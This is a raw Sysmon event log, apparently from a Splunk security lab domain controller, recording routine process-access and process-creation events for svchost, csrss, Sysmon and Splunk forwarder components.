13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42DD-6000-9400-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42DD-6000-9400-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.289{08A6967A-42DD-6000-9400-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42DE-6000-9500-000000009A01}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42DE-6000-9500-000000009A01}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42DE-6000-9500-000000009A01}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:54.135{08A6967A-42DE-6000-9500-000000009A01}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.985{08A6967A-42DF-6000-9600-000000009A01}49364968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42DF-6000-9600-000000009A01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:55.844{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 